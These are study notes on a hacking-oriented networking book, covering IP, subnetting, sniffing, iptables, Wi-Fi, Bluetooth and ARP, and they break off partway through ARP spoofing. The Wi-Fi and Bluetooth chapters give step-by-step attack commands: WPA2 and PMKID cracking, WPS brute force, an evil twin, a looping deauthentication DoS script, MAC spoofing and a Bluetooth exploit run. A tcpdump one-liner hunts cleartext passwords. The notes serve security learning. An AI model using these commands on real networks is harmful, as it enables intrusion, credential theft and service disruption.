📡 Network Basics for Hackers — Complete Notes

Book: Network Basics for Hackers · OccupyTheWeb (OTW) · InfoSec Press 2023
Platform: Kali Linux

Chapter 1 — Network Basics

1. IP Addresses

Every digital device is assigned an IP address — like a house address for the internet.

Current standard: IPv4 (Internet Protocol version 4)
Made up of 32 bits split into 4 octets (8 bits each)
Each octet = decimal value 0 to 255 (2⁸ = 256)

Binary:   11000000 . 10101000 . 00000001 . 01100101
Decimal:     192   .    168   .     1    .    101
             └── Example IP: 192.168.1.101

2. Classes of IP Addresses

Class	Range	Purpose
A	`0.0.0.0` – `127.255.255.255`	Very large networks
B	`128.0.0.0` – `191.255.255.255`	Medium networks
C	`192.0.0.0` – `223.255.255.255`	Small LANs (most common)

Subnet masks vary per class — covered in Chapter 2.

3. Public vs Private IP Addresses

Problem: IPv4 has only ~4.3 billion addresses for 7.5 billion people + devices.
Solution: Reuse private IP addresses inside LANs — they don't route on the internet.

Private IP Ranges

Range	Notes
`192.168.0.0` – `192.168.255.255`	Most home routers
`10.0.0.0` – `10.255.255.255`	Enterprise LANs
`172.16.0.0` – `172.16.255.255`	Mid-scale networks

🔍 Hacker Note: ifconfig on Kali will show your private IP. You need NAT (below) to reach the internet.

4. DHCP

Dynamic Host Configuration Protocol — automatically assigns IP addresses to devices on a LAN.

Device connects → sends request → DHCP server assigns IP for a "lease" period

IP assignment is temporary (dynamic lease)
On reconnect, you may get a different IP in the same range (e.g. 192.168.0.x)

5. NAT

Network Address Translation — lets multiple private-IP devices share one public IP.

[PC: 192.168.1.10] ─┐
[PC: 192.168.1.11] ─┤──► [NAT Router: 203.x.x.x] ──► Internet
[PC: 192.168.1.12] ─┘

How it works:

Device sends packet → NAT swaps private IP → public IP, records in table
Packet travels internet with public IP
Response arrives → NAT looks up table → forwards to correct private device

The devices never know translation is happening.

6. Ports

Ports are sub-addresses. IP = building address. Port = apartment number.

65,536 total ports (2¹⁶)
First 1,024 = well-known "common ports"

Must-Know Ports

Port	Protocol	Service
21	TCP	FTP
22	TCP	SSH
23	TCP	Telnet
25	TCP	SMTP (Email)
53	UDP/TCP	DNS
80	TCP	HTTP
110	TCP	POP3
143	TCP	IMAP
443	TCP	HTTPS
445	TCP	SMB
3389	TCP	RDP

Scan Ports with nmap

# TCP connect scan
sudo nmap -sT <target-IP>

# UDP scan
sudo nmap -sU <target-IP>

7. TCP/IP & Protocols

Protocols = agreed-upon rules for communication, defined in RFCs (Request for Comments).

Protocol	Full Name	Purpose
IP	Internet Protocol	Addressing & routing
TCP	Transmission Control Protocol	Reliable, ordered delivery
UDP	User Datagram Protocol	Fast, connectionless
HTTP	HyperText Transfer Protocol	Web browsing
SMTP	Simple Mail Transfer Protocol	Email
DNS	Domain Name System	Name → IP resolution
FTP	File Transfer Protocol	File transfer
SNMP	Simple Network Mgmt Protocol	Network device management

8. IP Header Anatomy

 0               1               2               3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Key Fields for Hackers

Field	Purpose	Hacker Use
TTL	Hops before expiry	OS fingerprinting (Linux≈64, Windows≈128, Cisco≈255)
Protocol	Inner protocol (TCP=6, UDP=17, ICMP=1)	Identify traffic type
IP Flags	Fragmentation (DF/MF bits)	Evade IDS/firewalls via fragmentation
Identification	Unique packet ID	Reassemble fragmented packets
Source/Dest IP	Sender & receiver	Trace origin; spoofing
Header Checksum	Integrity	Detect tampering

⚠️ Attack: Manipulate IP Flags with nmap or hping3 to fragment packets and evade detection.

9. TCP Header & Flags

The 6 TCP Flags

Flag	Name	Purpose	Hacker Use
SYN	Synchronize	Open new connection	SYN flood (DoS), stealth scan (`nmap -sS`)
ACK	Acknowledge	Confirm packet receipt	ACK scan to map firewall rules
FIN	Finish	Graceful close	FIN scan — closed ports reply RST
RST	Reset	Hard abort	TCP reset attacks to kill sessions
URG	Urgent	Immediate processing	Rarely used offensively
PSH	Push	Skip buffer → app	Interactive sessions (SSH, Telnet)

🎯 Tip: Illegal flag combos (SYN+FIN, all flags = XMAS scan) can fingerprint OS or evade detection. Use nmap or hping3.

Window Size & OS Fingerprinting

The Window Size field + TTL + DF flag can identify sender OS with ~80% accuracy.
Tool: p0f — passive OS fingerprinting (no packets sent to target).

10. TCP Three-Way Handshake

Every TCP connection requires a 3-way handshake before data transfer:

CLIENT                                SERVER
  │                                     │
  │─────────── SYN ───────────────────► │  "Hello, I want to talk"
  │                                     │
  │◄────────── SYN-ACK ─────────────── │  "Hi, I'm ready"
  │                                     │
  │─────────── ACK ───────────────────► │  "Great, let's go"
  │                                     │
  │═══════════ DATA TRANSFER ══════════ │

⚠️ SYN Flood Attack: Send massive SYN packets without completing ACK → server's connection table exhausts → Denial of Service (DoS).

11. UDP

User Datagram Protocol — connectionless, "fire and forget."

CLIENT                          SERVER
  │                               │
  │──── DATAGRAM ────────────────►│   No ACK. No guarantee.

Faster than TCP (no overhead, no handshake)
Unreliable — packets can be lost with no notification
Best for: streaming, DNS queries, SNMP, NTP

# UDP port scan (slower — no RST from open ports, nmap waits for timeout)
sudo nmap -sU <target-IP>

12. Network Topologies

Bus Topology

PC1 ──── PC2 ──── PC3 ──── PC4
         (single shared bus)

✅ Cheap & simple
❌ Congestion on busy networks

Star Topology (Most common for LANs)

         PC1
          │
PC4 ─── HUB ─── PC2
          │
         PC3

✅ Independent connections; one failure doesn't affect others
❌ Hub/switch = single point of failure

Ring Topology

PC1 → PC2 → PC3 → PC4 → (back to PC1)

✅ Simple, inexpensive
❌ One break = entire network down

Mesh Topology (How the internet works)

PC1 ─── PC2
 │  ╲ ╱  │
 │   ╳   │
 │  ╱ ╲  │
PC3 ─── PC4

✅ Highly resilient, many redundant paths
❌ Most expensive, complex
📱 Apps like Briar use mesh over Wi-Fi/Bluetooth for off-grid comms

13. The OSI Model

The Open Systems Interconnection model — 7 layers describing how network communication works.

Mnemonic (top → bottom): All People Seem To Need Data Processing
Mnemonic (bottom → top): Please Don't Throw Sausage Pizza Away

OSI Layers + Attack Map

┌──────────┬──────────────┬───────────────────────────┬────────────────────────┐
│  Layer 7 │ APPLICATION  │ HTTP, FTP, DNS, SMTP       │ ◄ Exploits             │
├──────────┼──────────────┼───────────────────────────┼────────────────────────┤
│  Layer 6 │ PRESENTATION │ SSL/TLS, Encryption        │ ◄ Phishing             │
├──────────┼──────────────┼───────────────────────────┼────────────────────────┤
│  Layer 5 │ SESSION      │ NetBIOS, RPC, SMB          │ ◄ Session Hijacking    │
├──────────┼──────────────┼───────────────────────────┼────────────────────────┤
│  Layer 4 │ TRANSPORT    │ TCP, UDP                   │ ◄ Reconnaissance       │
├──────────┼──────────────┼───────────────────────────┼────────────────────────┤
│  Layer 3 │ NETWORK      │ IP, ICMP, Routing          │ ◄ MitM Attacks         │
├──────────┼──────────────┼───────────────────────────┼────────────────────────┤
│  Layer 2 │ DATA LINK    │ Ethernet, ARP, MAC         │ ◄ MAC Spoofing         │
├──────────┼──────────────┼───────────────────────────┼────────────────────────┤
│  Layer 1 │ PHYSICAL     │ Cables, Wi-Fi, Signals     │ ◄ Sniffing             │
└──────────┴──────────────┴───────────────────────────┴────────────────────────┘

Layer	Primary Attack
Application (7)	Exploits — inject code into apps
Presentation (6)	Phishing — malicious email links
Session (5)	Session Hijacking — take over a legitimate session
Transport (4)	Reconnaissance — port scanning
Network (3)	Man-in-the-Middle (MitM) — intercept traffic
Data Link (2)	MAC Spoofing — fake hardware address
Physical (1)	Sniffing — capture raw network traffic

⚡ Exercises

What is the difference between public and private IP addresses? Is 172.16.242.63 public or private?
Run ifconfig — what IP does your system use?
Run sudo nmap -sT 127.0.0.1 — what ports are open?
Name the 6 TCP flags and what each one does.
What are the most common attacks against each OSI layer?

🔑 Quick Reference

IP CLASSES:       A: 0–127.x.x.x  |  B: 128–191.x.x.x  |  C: 192–223.x.x.x
PRIVATE IPs:      10.x.x.x  |  172.16.x.x  |  192.168.x.x
TCP FLAGS:        SYN  ACK  FIN  RST  URG  PSH
TTL BY OS:        Linux ≈ 64  |  Windows ≈ 128  |  Cisco ≈ 255

Chapter 2 — Subnetting & CIDR Notation

Why Subnetting?

IPv4 gives us 32 bits of address space. Subnetting lets admins divide a large network into smaller sub-networks to:

Use IP space more efficiently
Reduce broadcast traffic
Create separate security zones
Avoid putting thousands of devices on one flat network

Subnets

A subnet is a network within a network (Class A, B, or C). Subnets are created by "borrowing" bits from the host portion of an IP address to extend the network ID.

Class	Default Network Bits	Default Host Bits
A	8	24
B	16	16
C	24	8

Subnetting lets us create network IDs of any size, not just the defaults above.

Subnet Masks

A subnet mask tells you which bits belong to the network and which belong to the host.

Bit = 1 → part of the network
Bit = 0 → part of the host

IP Address:    192 .  168 .    1 .  101
Binary:     11000000.10101000.00000001.01100101

Subnet Mask:   255 .  255 .  255 .    0
Binary:     11111111.11111111.11111111.00000000
                                      └── host portion

Network ID:  192.168.1.0   (AND of IP & mask)
Host range:  192.168.1.1  –  192.168.1.254
Broadcast:   192.168.1.255

Bitwise AND operation determines the network address:

  11000000.10101000.00000001.01100101  (IP)
& 11111111.11111111.11111111.00000000  (mask)
= 11000000.10101000.00000001.00000000  (network = 192.168.1.0)

CIDR Notation

CIDR = Classless Inter-Domain Routing

Format: IP/prefix-length where prefix-length = number of network bits

192.168.1.0/24   →  24 network bits, 8 host bits  (255.255.255.0)
10.0.0.0/8       →  8 network bits, 24 host bits  (255.0.0.0)
172.16.0.0/16    →  16 network bits, 16 host bits (255.255.0.0)

Worked Example — Subnetting a Class C

Scenario: You have 192.168.1.0 (Class C, 254 hosts). You need 5 subnets with max 30 hosts each.

Step 1: Borrow bits from the host portion to create subnets.

3 borrowed bits → 2³ = 8 subnets (−2 reserved = 6 usable)
5 remaining host bits → 2⁵ = 32 addresses (−2 reserved = 30 hosts) ✅

Step 2: Calculate the new subnet mask.

Default /24:   11111111.11111111.11111111.00000000
Borrow 3 bits: 11111111.11111111.11111111.11100000
New mask:      255.255.255.224   →   /27

Step 3: The 6 usable subnets are:

Subnet	Network	Host Range	Broadcast
1	192.168.1.0/27	.1 – .30	.31
2	192.168.1.32/27	.33 – .62	.63
3	192.168.1.64/27	.65 – .94	.95
4	192.168.1.96/27	.97 – .126	.127
5	192.168.1.128/27	.129 – .158	.159
6	192.168.1.160/27	.161 – .190	.191

CIDR Quick Reference

CIDR	Subnet Mask	Hosts per Subnet
/24	255.255.255.0	254
/25	255.255.255.128	126
/26	255.255.255.192	62
/27	255.255.255.224	30
/28	255.255.255.240	14
/29	255.255.255.248	6
/30	255.255.255.252	2
/16	255.255.0.0	65,534
/8	255.0.0.0	16,777,214

💡 Formula: Hosts per subnet = 2^(32−prefix) − 2

Hacker Relevance

Subnet masks tell you what other IPs are on the same LAN as a compromised host
Use ifconfig or ip addr to see your subnet: 192.168.1.0/24 means scan .1 to .254
CIDR notation is used everywhere in firewall rules, routing tables, nmap scans:

# Scan an entire /24 subnet
sudo nmap -sT 192.168.1.0/24

# Block an entire subnet with iptables
sudo iptables -A INPUT -s 10.0.0.0/8 -j DROP

⚡ Exercises

What subnet mask gives you 14 usable hosts per subnet?
How many subnets can you create from 10.0.0.0/8 using a /24 prefix?
What is the broadcast address of 192.168.5.64/26?
Convert 255.255.255.192 to CIDR notation.

Chapter 3 — Network Analysis

CLI Network Tools

ifconfig

ifconfig                  # View all interfaces

Key output fields:

IPv4 private IP address
Netmask
Broadcast IP
IPv6 address
MAC address
Loopback (127.0.0.1)

ping

ping hackers-arise.com    # Test if host is alive (by domain)
ping 185.230.63.107       # Test by IP

Sends ICMP echo requests. If the host responds → it's up.

netstat

netstat -a                # All connections
netstat -t                # TCP only
netstat -u                # UDP only
netstat -l                # Listening ports only
netstat -a | grep http    # Filter for HTTP connections

Shows every connection coming in or going out. Useful for finding malware phoning home.

ss

ss                        # Similar to netstat, more info, better format

Network Sniffers

A network sniffer (packet analyzer / protocol analyzer) intercepts and logs network traffic.

Uses:

Find unencrypted passwords
Analyze DNS/MitM attack traffic
Reveal sites visited, cookies, user-agent strings
Forensic investigation

Requirement: NIC must be in promiscuous mode — picks up ALL packets, not just ones addressed to it.

Standard file format: .pcap (packet capture) — used by Wireshark, Snort, aircrack-ng, etc.

Popular sniffers:

tcpdump — CLI, lightweight, great for remote/non-GUI systems
Wireshark — GUI, the gold standard
tshark — CLI version of Wireshark
Network Miner, Capsa, SolarWinds

Controversial: The FBI used a tool called "Carnivore" for 20+ years to sniff suspected criminals' traffic — legal but controversial.

tcpdump

First Linux/UNIX sniffer (1988). Versatile, lightweight, perfect for remote/headless systems.

Basic Usage

sudo tcpdump                          # Capture everything
sudo tcpdump -w myoutput.cap          # Save to file

Filter by IP

sudo tcpdump host 192.168.0.114           # Traffic to/from IP
sudo tcpdump src host 192.168.0.114       # Traffic FROM IP only
sudo tcpdump dst host 192.168.0.114       # Traffic TO IP only

Filter by Port

sudo tcpdump dst port 80                  # Traffic to port 80
sudo tcpdump -vv dst port 80              # Verbose (decode headers + user-agent)

Filter by TCP Flags

sudo tcpdump 'tcp[tcpflags]==tcp-syn'     # SYN packets only
sudo tcpdump 'tcp[tcpflags]==tcp-ack'
sudo tcpdump 'tcp[tcpflags]==tcp-fin'
sudo tcpdump 'tcp[tcpflags]==tcp-rst'
sudo tcpdump 'tcp[tcpflags]==tcp-psh'
sudo tcpdump 'tcp[tcpflags]==tcp-urg'

Combine Filters

sudo tcpdump host 192.168.0.114 and port 80     # AND
sudo tcpdump port 80 or port 443                # OR
sudo tcpdump not host 192.168.0.114             # NOT / Negation

Hunt for Credentials

# Filter for cleartext passwords on common ports
sudo tcpdump port 80 or port 21 or port 25 or port 110 or port 143 or port 23 -lA \
  | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|password='

Grab User-Agent & Cookies

sudo tcpdump -vvAls | grep 'User-Agent'
sudo tcpdump -vvAls | grep 'Set-Cookie|Host|Cookie:'

3-Way Handshake in tcpdump Output

S      = SYN
S.     = SYN-ACK  (tcpdump uses "." for ACK)
.      = ACK

Wireshark

GUI-based sniffer — the de-facto standard. Built into Kali.

wireshark &     # Launch from terminal

Three Panes

┌─────────────────────────────────────┐
│  #1 Packet List Pane                │  ← Color-coded live packets
├─────────────────────────────────────┤
│  #2 Packet Details Pane             │  ← Header fields of selected packet
├─────────────────────────────────────┤
│  #3 Packet Bytes Pane               │  ← Hex (left) + ASCII (right) payload
└─────────────────────────────────────┘

Wireshark Filters

Filter	Purpose
`tcp`	TCP traffic only
`udp`	UDP traffic only
`http`	HTTP traffic
`dns`	DNS traffic
`smtp`	SMTP traffic
`ip.addr == 192.168.1.107`	Traffic to/from IP
`ip.src == 192.168.1.107`	From IP only
`ip.dst == 192.168.1.107`	To IP only
`tcp.dstport == 80`	TCP to port 80
`tcp contains facebook`	Payload contains string
`tcp.flags.rst == 1`	RST flag set
`tcp.flags.syn == 1`	SYN flag set

Note: Use == (double equals), not =. Single = does not work in Wireshark syntax.

Wireshark Operators

Operator	Meaning
`==`	Equal to
`!=`	Not equal to
`>`	Greater than
`<`	Less than
`>=`	Greater than or equal
`<=`	Less than or equal
`contains`	Field contains a value
`matches`	Matches a regex

Following Streams

Right-click a packet → Follow → TCP Stream

Shows the full conversation of a session (e.g. follow a rogue employee's connection).

Statistics

Statistics menu → IPv4 Statistics → All Addresses

Useful for baselining normal traffic and spotting anomalies.

⚡ Exercises

Use tcpdump to filter out all traffic not going to/from your IP address.
Connect to hackers-arise.com. Use Wireshark to filter only that site's traffic.
Use Wireshark to filter for traffic containing the word "hacker."
Use netstat to find all connections to your system.

Chapter 4 — Linux Firewalls (iptables)

What is a Firewall?

A firewall blocks certain network traffic going into or out of a computer.

Hardware firewall — protects the whole network
Software firewall — protects only the host it runs on

iptables is Linux's built-in, flexible CLI firewall utility. Available since January 2001 as part of the Linux kernel (Netfilter project).

iptables Structure

iptables has three core building blocks: Tables → Chains → Rules → Targets

Tables

Table	Purpose
FILTER	Default. Packet filtering (allow/block)
NAT	Rewrite source/destination of packets
MANGLE	Alter packet headers (e.g. modify TCP header)
RAW	Exemptions from connection tracking

Chains (in FILTER table)

Chain	Description
INPUT	Packets destined for the local system
OUTPUT	Packets leaving the local system
FORWARD	Packets being routed through the system

Targets (Actions)

Target	Action
ACCEPT	Allow the packet
DROP	Silently discard (no response to sender)
REJECT	Discard and send error back to sender
LOG	Log the packet
RETURN	Return to calling chain

Core Commands

# Install (usually pre-installed)
sudo apt install iptables

# View current rules
sudo iptables -L

# View with line numbers
sudo iptables -L --line-numbers

# View help
sudo iptables -h

Key Options

Option	Meaning
`-A`	Append rule to chain
`-D`	Delete rule from chain
`-L`	List rules
`-F`	Flush (delete all rules)
`-s`	Source address
`-d`	Destination address
`-p`	Protocol (tcp, udp, icmp)
`--dport`	Destination port
`-j`	Jump to target (ACCEPT, DROP, REJECT)

Creating Rules

Block an IP address

sudo iptables -A INPUT -s 192.168.1.102 -j DROP

Block an entire subnet

sudo iptables -A INPUT -s 192.168.1.0/24 -j DROP

Block a specific port

sudo iptables -A INPUT -p tcp --dport 22 -j DROP     # Block SSH
sudo iptables -A INPUT -p tcp --dport 445 -j DROP    # Block SMB

Allow outbound to a specific site

sudo iptables -A OUTPUT -p tcp -d amazon.com -j ACCEPT

Block all outbound web traffic (except above)

sudo iptables -A OUTPUT -p tcp --dport 80 -j DROP
sudo iptables -A OUTPUT -p tcp --dport 443 -j DROP

⚠️ Rule Order Matters! iptables processes rules top-to-bottom. The first match wins. Place ACCEPT rules BEFORE DROP rules for the same destination.

Flush (delete) all rules

sudo iptables -F

Default Policy

sudo iptables -L    # Shows current default policy (usually ACCEPT)

Default ACCEPT = allow everything unless a rule blocks it (permissive)
Default DROP = block everything unless a rule allows it (very secure, very tedious)

Full Example — Restricted Browsing

Allow only hackers-arise.com on ports 80/443, block everything else:

# 1. Allow outbound to hackers-arise.com
sudo iptables -A OUTPUT -p tcp -d hackers-arise.com -j ACCEPT

# 2. Block all other HTTP/HTTPS outbound
sudo iptables -A OUTPUT -p tcp --dport 80 -j DROP
sudo iptables -A OUTPUT -p tcp --dport 443 -j DROP

# 3. Check the table
sudo iptables -L

# 4. Reset when done
sudo iptables -F

⚡ Exercises

Create a firewall that only allows connections to hackers-arise.com on ports 80 and 443.
Add a rule to block port 445 (SMB).
Flush all rules when done.

Chapter 5 — Wi-Fi Networks (802.11)

Wi-Fi Basics (802.11)

Wi-Fi = IEEE 802.11 — wireless LAN standard maintained by the IEEE.
Also called WLAN (Wireless Local Area Network).

Key Terminology

Term	Meaning
AP	Access Point — where clients connect to get internet
PSK	Pre-Shared Key — the Wi-Fi password
SSID	Network name (e.g. "HomeWifi")
ESSID	Extended SSID — same as SSID but spans multiple APs
BSSID	Unique identifier of an AP (= AP's MAC address)
Channels	Wi-Fi operates on channels 1–14 (1–11 in USA)
Power	Signal strength. US limit = 0.5 watts (FCC)
Range	Legal limit ≈ 300ft (100m); with high-gain antenna up to 20 miles
Frequency	2.4 GHz and 5 GHz
Modes	master (AP), managed (client), monitor (hacker)

Security Protocols

Protocol	Year	Notes
WEP	~1997	Broken — RC4 flaw cracks in minutes
WPA	2003	Short-term fix — TKIP, longer IV (128-bit)
WPA2	2004	AES/CCMP — stronger, but still crackable
WPA3	~2018	Latest — rolling out but not yet widespread

WPA2 uses: AES-based CCMP, pairwise master key (PMK) derived from PSK + SSID.

Required Hardware for Hacking

Standard Wi-Fi cards cannot inject frames — required for most attacks.
Recommended: Alfa AWUS036NH (~$40 on Amazon) — compatible with aircrack-ng.

Check compatible chipsets: aircrack-ng.org compatible cards

Core aircrack-ng Commands

# View wireless interfaces
ifconfig
iwconfig                  # Wireless-only interfaces
iwlist                    # Scan for nearby APs

# Put adapter into monitor mode
sudo airmon-ng start wlan0        # Creates wlan0mon

# Kill processes that cause issues
sudo airmon-ng check kill

# Scan for APs and clients
sudo airodump-ng wlan0mon

# Focus on one AP and one channel, save capture
sudo airodump-ng --bssid <BSSID> -c <channel> --write <filename> wlan0mon

Attack 1 — WPA2-PSK (4-Way Handshake)

Goal: Capture the WPA2 4-way handshake hash, then crack it offline.

Step 1: Monitor mode
sudo airmon-ng start wlan0

Step 2: Scan for targets
sudo airodump-ng wlan0mon

Step 3: Capture handshake on target AP
sudo airodump-ng --bssid <BSSID> -c <channel> --write HackersAriseCrack wlan0mon

Step 4: (Optional) Force a client to reconnect (captures handshake faster)
sudo aireplay-ng --deauth 100 -a <BSSID> wlan0mon

Step 5: Crack the hash with hashcat
hashcat -m 16800 HackersAriseCrack-01.cap /path/to/wordlist.txt

The capture file HackersAriseCrack-01.cap contains the hash.
Good wordlist: top10000passwords.txt from hackers-arise.com

Attack 2 — WPS PIN Bruteforce

WPS (Wi-Fi Protected Setup) — press-a-button setup. Introduced a critical flaw:

PIN = 8 digits, but digit 8 is a checksum
First 4 and last 3 are checked separately
Total combinations: 10⁴ + 10³ = 11,000 PINs → brute-forceable in hours

Only affects WPS 1.0 (patched in WPS 2.0, ~2012). Still ~10-20% of APs vulnerable.

# Find APs with WPS enabled
sudo wash -i wlan0mon

# Brute-force WPS PIN with bully
sudo bully wlan0mon -b <BSSID> -e <ESSID> -c <channel>

# Or with reaver
sudo reaver -i wlan0mon -b <BSSID> -vv

Attack 3 — Evil Twin (MitM)

Goal: Create a fake AP with the same SSID. Knock clients off real AP → they connect to you → all traffic flows through your machine unencrypted.

# Step 1: Create fake AP (airbase-ng)
sudo airbase-ng -a aa:bb:cc:dd:ee:ff --essid <TARGET_SSID> -c 6 wlan0mon

# Step 2: Build a bridge (tunnel from fake AP → ethernet → internet)
sudo ip link add name ha type bridge
sudo ip link set ha up
sudo ip link set eth0 master ha
sudo ip link set at0 master ha     # at0 is the AP interface created by airbase-ng

# Step 3: Start DHCP on the tunnel
sudo dhclient ha &

# Step 4: Knock clients off the real AP
sudo aireplay-ng --deauth 1000 <BSSID> wlan0mon --ignore-negative-one

# Step 5: Open Wireshark → select "ha" interface → see all client traffic!

Attack 4 — DoS (Deauthentication Flood)

# One-shot deauth (kicks everyone off)
sudo aireplay-ng --deauth 100 -a <BSSID> wlan0mon

# Persistent DoS script (send deauths every 60s for ~3 days)
#!/bin/bash
for i in $(seq 1 5000); do
    aireplay-ng --deauth 100 -a <BSSID> wlan0mon
    sleep 60
done

Attack 5 — PMKID Attack (No Client Needed)

Discovered in 2018 by hashcat developers. Capture the hash from a single RSN frame — no client connection required.

# Install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool.git && cd hcxdumptool
make && make install

# Install hcxtools
git clone https://github.com/ZerBea/hcxtools.git && cd hcxtools
make && make install

# Put adapter in monitor mode
sudo airmon-ng start wlan0

# Capture PMKID from all nearby APs
sudo hcxdumptool -I wlan0mon -o HackersArisePMKID --enable_status=1

# Target a single AP (create a file with BSSID, no colons or spaces)
echo "<BSSID_NO_COLONS>" > targetBSSID
sudo hcxdumptool -I wlan0mon -o HackersArisePMKID --enable_status=1 \
  --filterlist_ap=targetBSSID --filtermode=2

# Convert to hashcat format
hcxcaptool -z hashoutput.txt HackersArisePMKID

# Crack
hashcat -m 16800 hashoutput.txt top10000passwords.txt

Defeating MAC Filtering

MAC filtering allows only specific MAC addresses to connect. Easily bypassed:

# Step 1: Find authenticated client's MAC with airodump-ng
sudo airodump-ng -c 11 -a --bssid <MAC> wlan0mon

# Step 2: Bring down interface
sudo ifconfig wlan0 down

# Step 3: Spoof to authenticated client's MAC
sudo macchanger -m <target_MAC> wlan0

# Step 4: Bring interface back up
sudo ifconfig wlan0 up
# Now connect normally — MAC whitelist thinks you're a legitimate client

Wi-Fi Frame Types (802.11) — Wireshark Filters

Frame	Type	Wireshark Filter
Association Request	Management	`wlan.fc.type==0x00`
Association Response	Management	`wlan.fc.type==0x01`
Probe Request	Management	`wlan.fc.type==0x04`
Probe Response	Management	`wlan.fc.type==0x05`
Beacon	Management	`wlan.fc.type==0x08`
Disassociation	Management	`wlan.fc.type==0x0A`
Authentication	Management	`wlan.fc.type==0x0B`
Deauthentication	Management	`wlan.fc.type==0x0C`
Data Frame	Data	`wlan.fc.type==0x20`
QoS Data	Data	`wlan.fc.type==0x28`

⚡ Exercises

Use iwconfig to view all wireless connections.
Use airmon-ng to place your adapter into monitor mode.
Use airodump-ng to find all APs and clients in range.
Use Wireshark to filter only your Wi-Fi interface traffic.
Use wash to find any WPS-enabled devices in range.

Chapter 6 — Bluetooth Networks

Bluetooth Basics

Developed in 1994 by Ericsson Corp. (Sweden)
Named after 10th-century Danish King Harald Bluetooth
Operates at 2.4–2.485 GHz using frequency hopping at 1,600 hops/second (security measure)
Minimum range: 10 meters; many devices up to 100 meters; extended with special antennas

Discoverable Device Broadcasts

Name
Class
List of services
Technical information

Pairing

When two devices pair, each exchanges a pre-shared secret (link key) stored for future pairing.
Every device has a unique 48-bit identifier (like a MAC address) and a manufacturer-assigned name.

Piconet

Bluetooth devices form a piconet — one master + up to 7 active slaves
Frequency hopping prevents interference between piconets

Linux Bluetooth Tools (BlueZ)

BlueZ = Linux's Bluetooth protocol stack (installed by default on Kali).

# View Bluetooth interfaces (like ifconfig for BT)
hciconfig
hciconfig hci0 up        # Bring up interface

# Inquiry / scanning tool (device name, ID, class, clock)
hcitool scan             # Scan for nearby devices
hcitool inq              # Inquiry mode

# Sniff Bluetooth communication
hcidump

Bluetooth Protocol Stack

┌─────────────────────────────┐
│  Adopted Protocols           │  PPP, UDP/TCP/IP, OBEX, WAP
├─────────────────────────────┤
│  Telephony Control           │  TCS Binary, AT-commands
├─────────────────────────────┤
│  Cable Replacement           │  RFCOMM
├─────────────────────────────┤
│  Bluetooth Core Protocols    │  Baseband, LMP, L2CAP, SDP
└─────────────────────────────┘

Applications typically use only one vertical slice of this stack.

Bluetooth Security Modes

Mode	Description
Mode 1	No active security
Mode 2	Service-level security — centralized security manager handles auth/config
Mode 3	Device-level security — authentication + encryption always on

Security mechanisms:

Frequency hopping algorithm (known only to paired devices)
Pre-shared link key (128-bit encryption)

Bluetooth Hacking Tools (Kali)

Go to: Applications → Kali Linux → Wireless Attacks → Bluetooth Tools

Tool	Purpose
Bluelog	Site survey — scan and log discoverable devices
Bluemaho	GUI suite for Bluetooth security testing
Blueranger	Locate devices using L2CAP pings, estimate distance
Btscanner	GUI scan for discoverable devices
Redfang	Find hidden Bluetooth devices
Spooftooph	Bluetooth spoofing tool

Bluetooth Attacks

Attack	Description
Blueprinting	Footprinting — enumerate device info
Bluesnarfing	Steal data (SMS, calendar, phonebook, images) from BT device
Bluebugging	Take full control of target's phone
Bluejacking	Send unsolicited "business card" messages
Bluesmack	Denial of Service against BT devices

BlueBourne Attack (CVE-2017-0785)

Released by Armis Security. Exploits SDP protocol — device only needs Bluetooth ON (not discoverable).
Affected: iOS (not iOS 10+), Windows, Android.

# Install dependencies
sudo apt-get install bluetooth libbluetooth-dev
pip install pybluez
pip install pwntools

# Clone the exploit
git clone https://github.com/ojasookert/CVE-2017-0785
cd CVE-2017-0785
chmod 755 CVE-2017-0785.py

# Find target's MAC address
hcitool scan

# Run the exploit
python CVE-2017-0785.py TARGET=<MAC_ADDRESS>

The script exploits the SDP vulnerability to extract memory from the device.

⚡ Exercises

Install BlueZ if not already on your system.
Use hciconfig to find your Bluetooth adapter's MAC address.
Use hcitool scan to find nearby Bluetooth devices.

Chapter 7 — Address Resolution Protocol (ARP)

What is ARP?

ARP (Address Resolution Protocol) maps logical IP addresses to physical MAC addresses on a LAN.

Operates at Layers 2 and 3 of the OSI model
Used by switches/routers to route traffic to the correct physical machine
No authentication — critical security weakness

How ARP Works

Computer 1 needs to send to Computer 2 (192.168.1.101)

1. Check ARP table → MAC for 192.168.1.101 found?
   YES → send directly to that MAC
   NO  → broadcast ARP request: "Who has 192.168.1.101?"

2. Computer 2 responds (unicast): "I have .101 — my MAC is 11:22:33:44:55:66"

3. Computer 1 updates ARP table → sends packet to 11:22:33:44:55:66

ARP Commands

Windows

arp -a        # View ARP table (shows IP, MAC, type: static/dynamic)

Linux

sudo arp -a   # View ARP table
sudo arp -v   # Verbose — shows flags mask and IP class

ARP Packets in Wireshark

Filter: arp

Expand Address Resolution Protocol in Packet Details to see:

Sender IP & MAC
Target IP & MAC

ARP for Reconnaissance

ARP has no authentication — attackers can send gratuitous ARP requests to discover all hosts on a LAN. Useful after compromising one machine and wanting to pivot to others (e.g. a database server).

netdiscover

sudo netdiscover -h                         # Help

sudo netdiscover -r 192.168.100.0/24        # Scan subnet

Output shows: IP address, MAC address, NIC vendor for every host on the network.

ARP Spoofing / MitM Attack

How it works:
Attacker sends gratuitous ARP replies claiming their MAC = the gateway's IP.
Victim updates ARP table → sends all traffic to attacker → Man-in-the-Middle.

Normal:   Victim ──────────────────► Gateway ──► Internet
